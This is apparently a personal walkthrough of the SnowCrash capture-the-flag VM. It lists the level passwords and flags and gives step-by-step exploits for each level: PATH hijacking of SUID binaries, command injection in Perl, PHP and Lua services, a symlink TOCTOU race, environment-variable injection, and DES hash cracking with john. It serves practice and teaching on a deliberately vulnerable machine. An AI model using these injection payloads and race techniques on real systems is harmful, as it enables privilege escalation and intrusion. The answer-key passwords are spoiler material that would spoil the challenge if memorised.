_____ _____ _
/ ____| / ____| | |
| (___ _ __ _____ _| | _ __ __ _ ___| |__
\___ \| '_ \ / _ \ \ /\ / / | | '__/ _` / __| '_ \
____) | | | | (_) \ V V /| |____| | | (_| \__ \ | | |
|_____/|_| |_|\___/ \_/\_/ \_____|_| \__,_|___/_| |_|
level00 x24ti5gi3x0ol2eh4esiuxias
level01 f2av5il02puano7naaf6adaaf
level02 kooda2puivaav1idi4f57q8iq
level03 qi0maab88jeaj46qoumi7maus
level04 ne2searoevaevoem4ov4ar8ap
level05 viuaaale9huek52boumoomioc
level06 wiok45aaoguiboiki2tuin6ub
level07 fiumuikeil55xe9cu4dood66h
level08 25749xKZ8L7DkSCwJkT9dyv6f
level09 s5cAJpM8ev6XHw998pRWG728z
level10 feulo4b72j7edeahuete3no7c
level11 fa6v5ateaw21peobuub8ipe6s
level12 g1qKMiRpXf53AWhDaU7FEkczr
flag00 nottoohardhere
flag01 abcdefg
flag02 ft_waNDReL0L
flag08 quif5eloekouj29ke0vouxean
flag09 f3iji1ju5yuevaus41q1afiuq
flag10 woupa2yuojeeaaed06riuj63cLevel 00 - 01 - 02 - 03 - 04 - 05 - 06 - 07 - 08 - 09 - 10 - 11 - 12
Subject PDF
tags: sed..cut or awk
> ssh -p 4242 level00@$(ifconfig|grep 'inet '|sed -n '2p'|cut -d' ' -f2)
^^^ ^^^
> ssh -p 4242 level00@$(ifconfig|grep 'inet '|awk 'NR==2{print $2}')
^^^> cat /etc/passwd π flag0x
> find / -user flag00 2>/dev/null -exec cat {} \;
OR
> find / -user flag00 2>/dev/null -exec cat {} +pwd: we are at/home/user/level00it's emptywhoami: level00ls -ldorls -la-d: current dir flag
level00@SnowCrash:~$ ls -ld
dr-xr-x---+ 1 level00 level00 100 Mar 5 2016 .dr-xr-x---+- User (me) and Group have r-x
- no one can write ie. no
vi rm mv touch
namei -l $(pwd)getfacl .(ACL: Access Control Lists)- Not much to do ... In fact writing to
/tmpis possible π
- Conventionally the
/tmpis world-writable
> ls -ld /tmp
d-wx-wx-wx 4 root root 80 Nov 19 19:58 /tmp
^^ ^^ - We often do
echo "something" > /tmp/go.sh && chmod +x /tmp/go.sh && sh /tmp/go.sh
/etcis another dir we can take advantage of
> ls -ld /etc
drwxr-xr-x 1 root root 260 Nov 19 18:30 /etc
^ ^- We as other_users, can
ls / catit
> ls -l /etc
> ls -l /etc | grep pass
> cat /etc/passwd
...
flag01:42hDRfypTqqnw:3001:3001::/home/flag/flag01:/bin/bash
...- π accidentally got
flag01 flag01is a username here. Maybeflag00is also a user
- Use
find /to lookup from root directory flag00is indeed a user
> find / -user level00 2>/dev/null
( ... )
> find / -user flag00 2>/dev/null
/usr/sbin/john
/rofs/usr/sbin/john
> ls -l /usr/sbin/john
----r--r-- 1 flag00 flag00 15 /usr/sbin/john
^
> ls -l /rofs/usr/sbin/john
----r--r-- 1 flag00 flag00 15 /rofs/usr/sbin/john
^flag00owns 2 readable files- cat them
> find / -user flag00 2>/dev/null -exec cat {} \;
OR
> find / -user flag00 2>/dev/null -exec cat {} +
cdiiddwpgswtgt
cdiiddwpgswtgt- π we have a cipher
\;: ends-execandcatone file a time+: nowfindrunscaton several files at once2>/dev/null: no error msg explosion (sending stderr output to/dev/null)
a = ord('a')
for i in range(26): print(''.join(chr(a+(ord(c)+i)%26) for c in s))> su flag00 nott*
> getflag | awk '{print $NF}'tags: encryption /etc/passwd john
Login
> ssh level01@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242
> Password: Look at /etc/passwd
> grep -i flag01 /etc/passwd
flag01:42hDRfypTqqnw:3001:3001::/home/flag/flag01:/bin/bash
> grep flag01 /etc/passwd | awk -F: '{print $2}'
42hDRfypTqqnwWhat is /etc/passwd
- it is a list of user accounts and their info
username:PWD:UID:GID:comment:home_dir:shell
^^^ ancient storage for encrypted passwd
now passwd hashes are stored in /etc/shadowSolution
- Download and use
john
wget https://download.openwall.net/pub/projects/john/contrib/macosx/john-1.8.0.9-jumbo-macosx_sse4.zip
tar -xvf john-1.8.0.9-jumbo-macosx_sse4.zip
cd john-1.8.0.9-jumbo-macosx_sse4/run
#echo "42hDRfypTqqnw" > infile
scp -P 4242 level01@$(ifconfig|grep 'inet '|sed -n '2p'|cut -d' ' -f2):/etc/passwd $(pwd)/infile
cat infile|grep flag01|awk -F: '{print $2}' > infile
./john infile
./john --show infile
cd ../..
rm -rf john*i have a script here
> ./do_john.sh> su flag01 abc*
> getflag | awk '{print $NF}'Why use john
./john --showprovides this line in the output
[DES 128/128 SSE2-16]- Data Encryption Standard (DES)
- DES is not truly encryption in the sense of encryption algorithms
- it is an old one-way transformation used to store passwds
- it is insecure due to small key size
- using john to bruteforce-crack it is the most effecive way
Login
> ssh level02@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242
> Password: scp -P 4242 level02@$(ifconfig|grep 'inet '|awk 'NR==2{print $2}'):/home/user/level02/level02.pcap $(pwd)hexdump -C level02.pcap | grep -i pass
xxd level02.pcap | grep -i passFound a .pcap file
### VM
> ls -l
----r--r-- 1 flag02 level02 level02.pcap
^ which means a regular file
> scp -P 4242 level02@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}'):/home/user/level02/level02.pcap $(pwd)-
~.pcap- Packet Capture- is used to store network packet data captured during network traffic monitoring
-
Save the
.pcapto Hostscp- secure copy -scp username@ip:path _local_
-
β Use Wireshark
- we do Analyze - Follow - TCP Stream
- copy
TCP Streamto text
000000D6 00 0d 0a 50 61 73 73 77 6f 72 64 3a 20 ...Passw ord:
000000B9 66 f
000000BA 74 t
000000BB 5f _
000000BC 77 w
000000BD 61 a
000000BE 6e n
000000BF 64 d
000000C0 72 r
000000C1 7f .
000000C2 7f .
000000C3 7f .
000000C4 4e N
000000C5 44 D
000000C6 52 R
000000C7 65 e
000000C8 6c l
000000C9 7f .
000000CA 4c L
000000CB 30 0
000000CC 4c L
000000CD 0d .7f- DE0d- CR- do the p3
Login
> ssh level03@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242
> Password: Inspect
- β
filereadelfstrings - also try
id, namei
> ls -l
-rwsr-sr-x 1 flag03 level03 8627 level03
^^^
^^^ SUID and SGID are set for exec, ie. whichever user/group run the
bin, it exec w/ temporary privileges of the owner of the file
π when ./level03 is run
the entire process runs with owner flag03's priviledges,
ie. we gain temporary permissions as flag03
β
Use ltrace
- tracing library function calls when the binary is executed
> ltrace ./level03
### output
getegid() = 2003
geteuid() = 2003
setresgid(2003, 2003, 2003, 0xb7e5ee55, 0xb7fed280) = 0
setresuid(2003, 2003, 2003, 0xb7e5ee55, 0xb7fed280) = 0
system("/usr/bin/env echo Exploit me" ...
### observations
π sets the real u/g id, the effective u|g id and
the saved set-user|group-ID of the calling process- Solution
> whereis getflag
getflag: /bin/getflag
> echo -e "/bin/getflag" > /tmp/echo
> chmod +x /tmp/echo
> export PATH=/tmp:$PATH π prepend tmp to get it checked first
> ./level03Login
> ssh level04@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242
> Password: We have a PERL script,
and it seems to interact with a webpage:
#!/usr/bin/perl
# localhost:4747
use CGI qw{param};
# CGI (Common Gateway Interface)
# param: a CGI module func fetches params from HTTP requests
# qw: quote words
print "Content-type: text/html\n\n";
sub x {
$y = $_[0];
print `echo $y 2>&1`;
# sub -- define subroutine x
# $_[0] -- subroutine `x()` takes a single arg`
# print w/ backticks invokes a shell command
# 2>&1 -- combine stdout and stderr, & means 1 is a fd not a filename
}
x(param("x"));
# 1st `x` : calling the subroutine
# 2nd `x` : a query param
# x comes in form of "...?x=getflag"Solution
- try to scan and connect to
localhost:4242 - set the query payload and Perl will echo it
> curl -I localhost:4747
or
> nc -vz localhost 4747
^ v: verbose
z: scan if a port is open (a listening daemon)
Connection to localhost 4747 port [tcp/*] succeeded!
# solve
curl localhost:4747?x="\`$(which getflag)\`"
curl localhost:4747?x="\`$(whereis getflag | awk '{print $2}')\`"
curl --get --data-urlencode 'x=;getflag' localhost:4747Login
> ssh level05@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242
> Password: Observation
- a hint says "mail" and "cronjob"
- also doing
find / -name level05 2>/dev/nulltells us 'mail' is the key
Inspect /var/mail
> ls /var/mail
level05
> ls -l /var/mail/
-rw-r--r--+ 1 root mail 58 Nov 17 20:25 level05
^ ie. file
> cat /var/mail/level05
*/2 * * * * su -c "sh /usr/sbin/openarenaserver" - flag05π There's a cronjob
- it runs every 2nd minute
- it runs a script as flag05
Inspect /usr/sbin/openarenaserver
> ls -l /usr/sbin/openarenaserver
-rwxr-x---+ 1 flag05 flag05 /usr/sbin/openarenaserver
^^^^^^ ^^^^^^ resource excl. to user flag05
> cat /usr/sbin/openarenaserver
#!/bin/sh
for i in /opt/openarenaserver/* ; do
(ulimit -t 5; bash -x "$i")
rm -f "$i"
doneWhat this script does:
- it runs each file of
/opt/openarenaserver/* - for each file, limit its exec runtime to 5 seconds
- for each file, we print out what it is, if it is a script
- rmv each file after use
Exploit
- put a script inside
/opt/openarenaserver/
$ \
echo '${which getflag} > /tmp/temp' > /opt/openarenaserver/go.sh && \
chmod +x /opt/openarenaserver/go.sh && \
tail -f /tmp/temp
# remember
# `/usr/sbin/openarenaserver` runs `bash -x` in a subshell
# it'll stdout nothing whether we `tee` `tee /dev/tty` or `sync` usetee: read stdin and write to stdout and files- let it be run in 2min
Login
> ssh level06@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242
> Password:
> ls -l
-rwxr-x--- 1 flag06 level06 356 level06.php
-rwsr-x---+ 1 flag06 level06 7503 level06
^PHP
#!/usr/bin/php
<?php
function y($m) {
$m = preg_replace("/\./", " x ", $m);
$m = preg_replace("/@/", " y", $m);
return $m;
}
function x($y, $z) {
$a = file_get_contents($y); π 1/ $y ie. $argv[1] should be a file
$a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a); π 2/ (.*) get called and the output goes to f()
$a = preg_replace("/\[/", "(", $a);
$a = preg_replace("/\]/", ")", $a); π both lines trivial
return $a;
}
$r = x($argv[1], $argv[2]);
print $r;
?> Either one of
echo '[x ${`getflag`}]' > /tmp/temp
echo '[x ${(exec(getflag))}]' > /tmp/temp
echo '[x {${system(getflag)}}]' > /tmp/tmp
THEN
./level06 /tmp/temp- attention:
'[x ${(exec(getflag))}]'and not"[x ${(exec(getflag))}]"bc.""allows expansion
Login
> ssh level07@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242
> Password:
> ls -l
-rwsr-sr-x 1 flag07 level07 8805 level07
^ i can exec this bin as use 'flag07' ie. my privileges elevated as if i were flag07Command list
> file level07
> strings level07
> xxd level07 | grep level
> xxd level07 | grep -A3 -B3 level
> readelf -s ./level07 | grep -E 'getenv|system|exec|echo|puts|write|printf'
regex ^^
> objdump -d level07 | grep -E "getenv|system|exec|echo|puts|write|printf"
> ltrace ./level07 π’
> readelf -p .rodata ./level07 π’ this one does the jobUsing readelf -p .rodata and ltrace
-p:printable-string-dumpdisplays contents of a section.rodata:read-only datasection = what we want to see
String dump of section '.rodata':
[ 8] LOGNAME
^^^^^^^ π’
[ 10] /bin/echo %s > ltrace ./level07
__libc_start_main(0x8048514, 1, 0xbffff7f4, 0x80485b0, 0x8048620 <unfinished ...>
getegid() = 2007
geteuid() = 2007
setresgid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280) = 0
setresuid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280) = 0
getenv("LOGNAME") = "level07"
^^^^^^^ π’
asprintf(0xbffff744, 0x8048688, 0xbfffff4b, 0xb7e5ee55, 0xb7fed280) = 18
system("/bin/echo level07 "level07
<unfinished ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 0
+++ exited (status 0) +++Run it and we found that it prints LOGNAME
> env logname
> ./level07 whoami
level07
> ./level07 env
level07
> export LOGNAME='`id`'
> ./level07
uid=3007(flag07) gid=2007(level07) groups=3007(flag07),100(users),2007(level07)Solution
> export LOGNAME='$(getflag)'
> export LOGNAME=";getflag"
> export LOGNAME='`getflag`'
THEN
> ./level07Login
> ssh level08@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242
> Password:
> ls -l
-rwsr-s---+ 1 flag08 level08 8617 level08
-rw------- 1 flag08 flag08 26 token
^^^^^^ ^^^^^^ both flag08, not level08 π‘2 files:
> cat token
cat: token: Permission denied
> ./level08
./level08 [file to read]Tryout
> echo "a" > /tmp/tmp && ./level08 /tmp/tmp
a
> ltrace ./level08 /tmp/tmp
__libc_start_main(0x8048554, 2, 0xbffff7d4, 0x80486b0, 0x8048720 <unfinished ...>
strstr("/tmp/tmp", "token") = NULL
open("/tmp/tmp", 0, 014435162522) = 3
read(3, "a\n", 1024) = 2
write(1, "a\n", 2a
) = 2
+++ exited (status 2) +++> echo "aB" > /tmp/tmp && ./level08 /tmp/tmp
aB
> ltrace ./level08 /tmp/tmp
__libc_start_main(0x8048554, 2, 0xbffff7d4, 0x80486b0, 0x8048720 <unfinished ...>
strstr("/tmp/tmp", "token") = NULL
open("/tmp/tmp", 0, 014435162522) = 3
read(3, "a\n", 1024) = 2
write(1, "a\n", 2a
) = 2
+++ exited (status 2) +++Observation:
- only the filename matters
./levelwill cat the file, as long as filename contains no substr "token"- renaming
./tokenis not allowed - but we can make a symlink of it
- syntax:
ln -s real_path_src real_path_symlink
- syntax:
Solution
> ln -s `realpath token` /tmp/totem
> ./level08 /tmp/totemLogin
> ssh level09@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242
> Password:
> ls -l
-rwsr-sr-x 1 flag09 level09 7640 level09
----r--r-- 1 flag09 level09 26 token> xxd token
> hexdump -C tokenTryout
> ./level09 token
tpmhr
> ./level09 123
135
> ./level09 246
258
> ./level09 abcd
aceg
> ./level09 xyz
xz|
> ./level09 az
a{
level09@SnowCrash:~$ ./level09 za
zb
level09@SnowCrash:~$ ./level09 zab
zbd π char = curr - i
π
^ ^
z = z + 0 β z = z - o
b = a + 1 β a = b - 1
d = b + 2 β b = d - 2
v vSolution
- Simple algo. Either use python2 in vm, (respect the syntax),
# p2
line = open('/home/user/level09/token').read().strip()
print 'res/', ''.join(chr(ord(_) - i) for i,_ in enumerate(line))- or p3 in Host,
scpthe token to Host first
# p3
line = open(0, 'rb').read().strip()
print('res/', ''.join(chr(_ - i) for i,_ in enumerate(line)))# scp to Host
> scp -P 4242 level09@$(ifconfig|grep 'inet '|awk 'NR==1{first=$0}END{print $2}'):/home/user/level09/token $(pwd)
> 25749xKZ8L7DkSCwJkT9dyv6f
> chmod 777 token
> p3 decode.py < tokenLogin
> ssh level10@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242
> Password: Tryout
- 2 files, seen it before
- try -
cat-./level10-./level10 token localhost
> ls -l
-rwsr-sr-x+ 1 flag10 level10 10817 level10
-rw------- 1 flag10 flag10 26 token
> cat token
cat: token: Permission denied
> ./level10
./level10 file host
sends file to host if you have access to it
> ./level10 token localhost
You don't have access to ./tokenProblem
- The main issue here is file
./token- we dont have its permission ltrace- find out how./level10checks permission- it uses
access()
- it uses
> ltrace ./level10 token localhost
__libc_start_main(0x80486d4, 3, 0xbffff7d4, 0x8048970, 0x80489e0 <unfinished ...>
access("token", 4) = -1
^^^^^^ π‘
printf("You don't have access to %s\n", "token"You don't have access to token
) = 31
+++ exited (status 31) +++- Touch a file of our own, try again
> ./level10 /tmp/tmp localhost
Connecting to localhost:6969 .. Unable to connect to host localhost
> ltrace ./level10 /tmp/tmp localhost
__libc_start_main(0x80486d4, 3, 0xbffff7d4, 0x8048970, 0x80489e0 <unfinished ...>
access("/tmp/tmp", 4) = 0
printf("Connecting to %s:6969 .. ", "localhost") = 32
^^^^ π‘
fflush(0xb7fd1a20Connecting to localhost:6969 .. ) = 0
^^^^ π‘ - The program interacts with
localhiost:6969 - we need a valid Host IP :
127.0.0.1, or the old trickifconfig | grep 'inet ' | awk 'NR==2 {print $2}' | cut -d ":" -f2
> ./level10 /tmp/tmp $(ifconfig | grep 'inet ' | awk 'NR==2 {print $2}' | cut -d ":" -f2)
Connecting to Localhost:6969 .. Connected!
Sending file .. wrote file!nc, ltrace
- it opens and reads and sends out
/tmp/tmpcontent - it sends the content to
Localhost:6969
# t1
> nc -kl 6969# t2
> touch /tmp/tmp
> ./level10 /tmp/tmp Localhost
> Connecting to Localhost:6969 .. Connected!
Sending file .. wrote file!- we want it to open/read/send the
tokeninstead!
> ltrace ./level10 /tmp/tmp $(ifconfig|grep 'inet '|awk 'NR==2 {print $2}'|cut -d ":" -f2)
.
.
.
printf("Connected!\nSending file .. "Connected!
) = 27
fflush(0xb7fd1a20Sending file .. ) = 0
open("/tmp/tmp", 0, 010) = 4
^^^^^^^^ π‘ here is where our `token` should be read
read(4, "", 4096) = 0
write(3, "", 0) = 0
puts("wrote file!"wrote file!
) = 12
+++ exited (status 12) +++Goal
- Figure out a way to force
./level10to read the truetoken:- exploit
access()'s TOCTOU vulnerability
- exploit
- How: let's create a racing condition
- Design a file to do the following:
- force
access()to check a low-priority file - then,
open()andread()deal w/ the hi-priority one
- force
Solution:
- we need a file that alternates its own type
- type 1: a symlink to
token - type 2: a regular file of our own
- type 1: a symlink to
- write a script to do this π
alternate.sh
rm -rf /tmp/tmp
t=/tmp/tmp
while true; do
touch $t
rm -rf $t
ln -s /home/user/level10/token $t
rm -rf $t
donerunner.sh
IP=$(ifconfig | grep 'inet ' | awk 'NR==1 {print $2}' | cut -d ":" -f2)
while true; do
#/home/user/level10/level10 /tmp/tmp ${IP} >/dev/null
/home/user/level10/level10 /tmp/tmp $(hostname -I | awk '{print $1}') >/dev/null
donechmod 777 /tmp/alt.sh /tmp/go.sh
sh /tmp/alt.sh 2>/dev/null & sh /tmp/go.sh 2>/dev/null & nc -kl 6969 | grep -E '[a-z0-9]'
kill $(jobs -p)Login
> ssh level11@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242
> Password: Tryout
- We have a Lua script
- A TCP server is created and it listens on localhost port 5151
- It get an input, concat it to
echow/o sanitization
> ls -l
-rwsr-sr-x 1 flag11 level11 668 level11.lua#!/usr/bin/env lua
local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 5151))
π‘ a TCP server listening ^^^^
for conn on localhost:5151
function hash(pass)
^^^^ π‘ a function converts `pass` to sha-1 hash
prog = io.popen("echo "..pass.." | sha1sum", "r")
^^^^^ π‘ do `echo <pass> | sha1sum` and read stdout
π΅ this is prone to command injection because
`"echo " .. pass ..` concat unsanitized inputs
data = prog:read("*all")
prog:close()
data = string.sub(data, 1, 40)
return data
while 1 do
local client = server:accept()
client:send("Password: ")
^^^^^^^^^ π΅ we will inject a payload here
client:settimeout(60)
local l, err = client:receive()
if not err then
print("trying " .. l)
local h = hash(l)
if h ~= "f05d1d066fb246efe0c6f7d095f909a7a0cf34a0" then
client:send("Erf nope..\n");
else
client:send("Gz you dumb*\n")
end
end
client:close()Run the script
- we find the server is up and running
ncto it, it is the same Lua program asking for password
> ./level11.lua
lua: ./level11.lua:3: address already in use
stack traceback:
[C]: in function 'assert'
./level11.lua:3: in main chunk
[C]: ?Solution
- Goal: design a string for
hash()to concat toecho- halt
echow/; - then do what we want
gettoken > /tmp/tmp - ie.
echo ;gettoken > /tmp/tmp | sha1sum - the piping to sha1sum is discarded
- halt
> nc localhost 5151
OR
> telnet localhost 5151
---
Password: ;getflag > /tmp/tmp
OR
Password: ;getflag | wallLogin
> ssh level12@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242
> Password: fa6v5ateaw21peobuub8ipe6s> ls -l level12.pl
-rwsr-sr-x+ 1 flag12 level12 464 level12.plSee more
> cat level12.pl
#!/usr/bin/env perl
# localhost:4646
use CGI qw{param};
print "Content-type: text/html\n\n";
sub t {
$nn = $_[1];
$xx = $_[0]; π
$xx =~ tr/a-z/A-Z/; π
$xx =~ s/\s.*//;
@output = `egrep "^$xx" /tmp/xd 2>&1`;
π backticks in Perl will run the Bash cmd
π if xx is also in backticks it also gets expanded/exec
foreach $line (@output) {
($f, $s) = split(/:/, $line);
if($s =~ $nn) {
π nn is empty bc. arg 1 is empty so ($s =~ "") is always true
return 1;
}
}
return 0;
}
sub n {
if($_[0] == 1) {
print("..");
} else {
print(".");
}
}
n(t(param("x"), param("y"))); π query's key: x, yinput (x)is not sanitized before inserted in the cmd""- PERL interpolates/evals variables inside double quotesegrep- PERL runs this unsanitized cmd as part ofegrep- since
/tmp/gohasx|777 getflag will be run
> echo "getflag | wall" > /tmp/GO
> chmod 777 /tmp/GO
> curl 'http://10.0.2.15:4646?x=`/*/GO`'there you have it in tmp tmp